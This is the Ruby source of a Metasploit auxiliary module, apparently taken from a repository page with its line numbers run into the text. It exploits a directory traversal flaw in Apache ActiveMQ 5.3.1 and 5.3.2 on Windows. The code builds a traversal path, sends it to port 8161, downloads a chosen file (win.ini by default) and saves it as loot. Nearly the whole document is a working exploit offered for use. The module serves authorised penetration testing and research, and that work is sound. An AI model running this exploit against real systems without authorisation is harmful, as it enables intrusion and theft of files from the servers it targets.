Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_traversal.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Apache ActiveMQ Directory Traversal',15'Description' => %q{16This module exploits a directory traversal vulnerability in Apache ActiveMQ175.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's18ResourceHandler installed with the affected versions. This module has been tested19successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.20},21'License' => MSF_LICENSE,22'Author' => [23'AbdulAziz Hariri', # Vulnerability discovery24'juan vazquez' # Metasploit module25],26'References' => [27[ 'OSVDB', '86401' ],28[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],29[ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]30],31'Notes' => {32'Reliability' => UNKNOWN_RELIABILITY,33'Stability' => UNKNOWN_STABILITY,34'SideEffects' => UNKNOWN_SIDE_EFFECTS35}36)37)3839register_options(40[41Opt::RPORT(8161),42OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),43OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])44]45)46end4748def run_host(ip)49# No point to continue if no filename is specified50if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?51print_error("#{rhost}:#{rport} - Please supply FILEPATH")52return53end5455travs = "/\\.." * (datastore['DEPTH'] || 1)56travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"57travs << datastore['FILEPATH']5859print_status("#{rhost}:#{rport} - Sending request...")60res = send_request_cgi({61'uri' => travs,62'method' => 'GET',63})6465if res and res.code == 20066contents = res.body67fname = File.basename(datastore['FILEPATH'])68path = store_loot(69'apache.activemq',70'application/octet-stream',71ip,72contents,73fname74)75print_status("#{rhost}:#{rport} - File saved in: #{path}")76else77print_error("#{rhost}:#{rport} - Failed to retrieve file")78return79end80end81end828384